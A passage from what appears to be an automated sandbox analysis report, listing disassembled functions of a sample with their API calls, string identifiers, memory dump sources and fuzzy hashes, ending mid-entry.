                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                    • String ID: A
                                                                                                                    • API String ID: 3731854180-3554254475
                                                                                                                    • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction ID: a0b601ccd5637211f41bbeaa8fe29e82144f50270297ae409c0137a31fe209b1
                                                                                                                    • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction Fuzzy Hash: 05A18C6190D6868AE660AF61E44427DFBB4FF45F92FA48034DA4E47794EF3CE441DB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$Openwcsrchr
                                                                                                                    • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                    • API String ID: 3402383852-1459555574
                                                                                                                    • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction ID: dc353c4174861aaa6e403e47b12eee31b0740c6506c188e98ccad63909a334d8
                                                                                                                    • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction Fuzzy Hash: 25A1C561A0864A82EE10BF95D0102BDEAB4FF85F96FE44531DA4E07785EF7CD949C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC99F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                    • String ID: FOR$ IF
                                                                                                                    • API String ID: 557945885-2924197646
                                                                                                                    • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction ID: 9d7bd50e53cce0e2e9e577b5bd62e5e80c7115c79b2af122b9cb92195f6da429
                                                                                                                    • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction Fuzzy Hash: 83519120B0965A82FE54BF159418179AEB1FF85FA6FE84634D91E477D1DE3CE901C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                    • String ID: %04X-%04X$:
                                                                                                                    • API String ID: 930873262-1938371929
                                                                                                                    • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                    • Instruction ID: 987e320783ec34387ee0c211e347fd015ad4fd4f9941b4e9560be08a93d5f1c2
                                                                                                                    • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                    • Instruction Fuzzy Hash: 5E417C21A0CA8AC2EB60AF61E4502BAFAB5FB84B56FE04135DA4E426C5DF3DD544C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                    • API String ID: 3249344982-2616576482
                                                                                                                    • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                    • Instruction ID: e05ed1e9b0d306c41e542908a96debe3902c02e50c622f39b299e96652b70643
                                                                                                                    • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                    • Instruction Fuzzy Hash: 36413C72A18A4586F3509F12E848769EAB4FB89FDAF949234DA4E07794DF3CD054CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$iswdigit
                                                                                                                    • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                    • API String ID: 2770779731-632268628
                                                                                                                    • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                    • Instruction ID: df34de3fc4468446fb830bcdb7bf00a112f6337bb3878cfdd0e37d3c24870b52
                                                                                                                    • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                    • Instruction Fuzzy Hash: 5A31EC32609F5AC5EA50AF11E454279BFB0FB49F86BA58135EA4E43354EF3CE404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1673
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD168D
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1757
                                                                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD176E
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1788
                                                                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD179C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Alloc$Size
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3586862581-0
                                                                                                                    • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                    • Instruction ID: 56e892b6d7901b216f60635b3cdf219a5eae635652501a2592727b73aa0c53b4
                                                                                                                    • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                    • Instruction Fuzzy Hash: 56916065A0974A82EA54AF15E448278FAB0FB44F96FA98135DA4D07BE0EF3DE445C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1313749407-0
                                                                                                                    • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                    • Instruction ID: 09392f7bbeb452ea1877d56a8684b0c8022e84669c73cc8794654376f6eb8bdb
                                                                                                                    • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                    • Instruction Fuzzy Hash: 7A51B361A0968A52EA54BF159818179EEB5FF85F93FA84234DE1E077D1EF3CE841C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCF5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$iswspacewcschr
                                                                                                                    • String ID: )$=,;
                                                                                                                    • API String ID: 1959970872-2167043656
                                                                                                                    • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                    • Instruction ID: d03cb7889527400858b9b2eaf56293869ff79451347d70d63488c7fa10b4111f
                                                                                                                    • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                    • Instruction Fuzzy Hash: BE417964E0825B96FBA46F11E558379BEB0BF10FABFF45076C98D421A0DF3CA441C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                    • String ID: KEYS$LIST$OFF
                                                                                                                    • API String ID: 411561164-4129271751
                                                                                                                    • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                                                    • Instruction ID: 23122a5cb2d335a7735743499607e02b8607d39f7e468d79c9e067c2f33d8768
                                                                                                                    • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                                                    • Instruction Fuzzy Hash: 96217120A0861BC1FA54BF66E454179EA75FF84F92FE09631DA1E472E5EE3CD444C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit
                                                                                                                    • String ID: GeToken: (%x) '%s'
                                                                                                                    • API String ID: 3849470556-1994581435
                                                                                                                    • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                    • Instruction ID: 4ccf32908bc8f0a3a7b37b05489718d9b68e1c6949ec681cbd4bfbd0e642b850
                                                                                                                    • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                    • Instruction Fuzzy Hash: D1517C31A0864AC5EB64AF65E444279BBB0FF84F6AFA48435DA4D47390DF7DE841C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$CurrentDirectorytowupper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1403193329-0
                                                                                                                    • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                    • Instruction ID: cfce7da31b5c915edee0c46d5dfa7cbb31c75f7653b501316315413a2e349f04
                                                                                                                    • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                    • Instruction Fuzzy Hash: 2F51D826A09689C5EB24EF20D8586B9BBB0FF48F9AF958135DA0D07794EF3CD544C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_setjmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3883041866-0
                                                                                                                    • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                    • Instruction ID: a485904a49f6f34e065a4957c3663e57087ae8433d1bcef19e9ba5c4edc52401
                                                                                                                    • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                    • Instruction Fuzzy Hash: EF513E32608BCA8AEB61DF21D8503E9B7B4FB49B49FA04135EA4D87A48DF3DD645C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC65F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3114114779-0
                                                                                                                    • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                    • Instruction ID: 8121301643bbce0c4bd63a7c000571337ba898b44b73f03a4b7f0b1b27b389e5
                                                                                                                    • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                    • Instruction Fuzzy Hash: CF413B36A05B46CAE700DF65D4442AC7BB5FB48B59FA44035EE0D93B54DF38E415C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
